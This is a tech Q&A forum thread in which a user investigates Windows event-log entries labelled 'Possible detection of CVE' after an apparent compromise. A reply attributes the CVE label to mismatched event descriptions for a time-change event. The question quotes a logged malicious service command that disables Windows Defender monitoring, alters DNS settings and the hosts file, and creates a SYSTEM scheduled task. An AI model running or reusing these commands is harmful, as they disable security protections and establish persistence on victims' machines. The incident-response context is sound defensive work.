Alert " Possible detection of CVE"

event-log

From Windows event log, did the exploit was blocked? Can I get what CVE number from event log so I can know the specific KB number?

39536 Apr 13 08:31 Information Microsoft-Windows-Kernel-General 
1 Possible detection of CVE: 2020-04-13T01:31:16.580703600Z
Additional Information: 2020-04-13T01:31:16.580796000Z
This Event is generated when an attempt to exploit a known vulnerability 2020-04-13T01:31:16.580703600Z) is detected.
This Event is raised by a User mode process.

Also I got this malware log 

Apr 13 08:29 Information Service Control Manager 1073748869 A service was installed in the system.
Service Name:  SYYHQSMMFDSEFEVOTKNH
Service File Name:  %COMSPEC% /C "cmd /c powershell -c
Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).
SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$rh=-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122)));$cmd='schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr \"powershell -c ''*awcna*

I already have patched the machine with MS 17-010 and haven't found successful logon from the log. So confusing..


I just posted this on a Microsoft forum question, and figured I'd share here (I like SE much better than MS forums :-P)

I just ran into this as well. One thing I did notice when trying to get more info is that there seems to be a discrepancy between what PowerShell is reporting and what the Event Viewer GUI is reporting. For Event 1 Category 5, I'm getting:

  • PowerShell: Possible detection of CVE: , Additional Information: . This Event is generated when an attempt to exploit a known vulnerability () is detected. This Event is raised by a User mode process.
  • GUI: The system time has changed to ‎ from ‎

There is an associated Event 24 Category 11 that is showing:

  • PowerShell: The description for Event ID '24' in Source 'Microsoft-Windows-Kernel-General' cannot be found. The local computer may not have the necessary registry information or message DLL files to display the message, or you may not have permission to access them. The following information is part of the event:

  • GUI: The time zone information was refreshed with exit reason . Current time zone bias is .

Given the data that was passed, it looks to me like the GUI is right (time adjustment), and PowerShell is getting the wrong descriptions (CVE detection) for the events. The first event is passing datetimes that look like before and after datetimes, and the second event's second parameter is -600, which I believe correlates to the timezone I'm in (AEST, GMT+10, so 600 minute adjustment).

Related

Matching comma seperated values in 2 different cells and display non-duplicate values in 3rd cell
ffmpeg: aphasemeter, meaning of measurement
How to open/mount a BKF file?
How does one clear dig's DNS cache on Ubuntu?
Can I enable my Realtek sound card without speakers plugged in?
Unable to install WIndows 7
Create .bat to recursively delete subfolders
Adding additional locations to Office 2013 save "Places"
Is it ok to delete the WCH.CN folder?
where can i download touch screen interface driver?
Why do hard drives still use 512 bytes emulated sectors?
Mount / Read the contents of a binary dump from a BIOS eeprom?